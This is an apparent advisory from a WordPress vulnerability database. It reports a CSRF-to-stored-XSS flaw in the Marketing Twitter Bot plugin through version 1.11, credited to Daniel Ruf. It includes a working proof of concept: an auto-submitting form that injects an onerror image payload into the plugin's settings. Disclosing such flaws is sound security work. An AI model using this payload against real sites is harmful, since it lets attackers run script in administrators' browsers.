WordPress Plugin Vulnerabilities

Marketing Twitter Bot <= 1.11 - Settings Update to Stored XSS via CSRF

Description

The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack

Proof of Concept

Have an admin open an HTML page containing the following:

```
<form action="http://example.com/wordpress/wp-admin/admin.php?page=mtb_menu" method="POST">
    <input type="text" name="twitter_mtb_consumer_key" value='"><img src=x onerror=alert(1)>'>
    <input type="text" name="twitter_mtb_consumer_secret" value="1">
    <input type="text" name="twitter_mtb_access_token" value="1">
    <input type="text" name="twitter_mtb_access_token_secret" value="1">
    <input type="text" name="mtb" value="true">
</form>
<script>
    document.forms[0].submit();    
</script>
```

Affects Plugins

References

Classification

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes

Timeline

Publicly Published
2024-01-23 (about 3 months ago)
Added
2024-01-23 (about 3 months ago)
Last Updated
2024-01-23 (about 3 months ago)

Other